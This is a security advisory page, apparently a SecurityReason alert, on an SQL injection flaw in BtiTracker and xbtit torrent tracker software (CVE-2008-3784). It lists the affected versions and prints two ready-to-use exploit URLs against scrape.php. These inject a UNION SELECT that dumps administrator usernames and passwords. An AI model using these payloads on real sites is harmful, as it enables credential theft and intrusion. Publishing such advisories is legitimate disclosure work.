|
|
| Details : SecurityAlert |
|
|
Topic : | BtiTracker <= 1.4.7, xbtit <= 2.0.542 SQL Injection Vulnerability
|
SecurityAlert : 4186
CVE : CVE-2008-3784
CWE : CWE-89
SecurityRisk : High (About)
Remote Exploit : Yes
Local Exploit : No
Victim interaction required : No
Exploit Given : Yes
Credit : InATeam
Published : 27.08.2008
Affected Software : | Btiteam, Btitracker, 1.4.7, and previous
Btiteam, Xbtitracker, 2.0.542, and previous
Btiteam, Btitracker, 1.4.1
Btiteam, Btitracker, 1.4.2
Btiteam, Btitracker, 1.4.3
Btiteam, Btitracker, 1.4.4
Btiteam, Btitracker, 1.4.5
Btiteam, Btitracker, 1.4.6
Btiteam, Xbtitracker, 2.0.477
|
 Advisory Text : ## BtiTracker/xBtiTracker Remote SQL Injection Vulnerability
## Author: InATeam (http://inattack.ru/)
## Affected versions: BtiTracker <= 1.4.7, xBtiTracker <= 2.0.542
## Software site: http://www.btiteam.org/
##
##
===========================================================================
===
## Exploit:
##
===========================================================================
===
## http://site/scrape.php?info_hash=1%27)
##
+UNION+SELECT+0,CONCAT(0x3C623E,username,0x3a,password,0x3C2F623E3C62723E),
0,0
## +FROM+users+WHERE+id_level=8/*
##
===========================================================================
===
## for xBtiTracker we need to specify prefix:
##
===========================================================================
===
## http://site/scrape.php?info_hash=1%27)
##
+UNION+SELECT+0,CONCAT(0x3C623E,username,0x3a,password,0x3C2F623E3C62723E),
0,0
## +FROM+xbtit_users+WHERE+id_level=8/*
##
===========================================================================
===
References :
http://www.securityfocus.com/bid/30811
http://www.milw0rm.com/exploits/6296
Feedback :
If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com.
|
|
|
|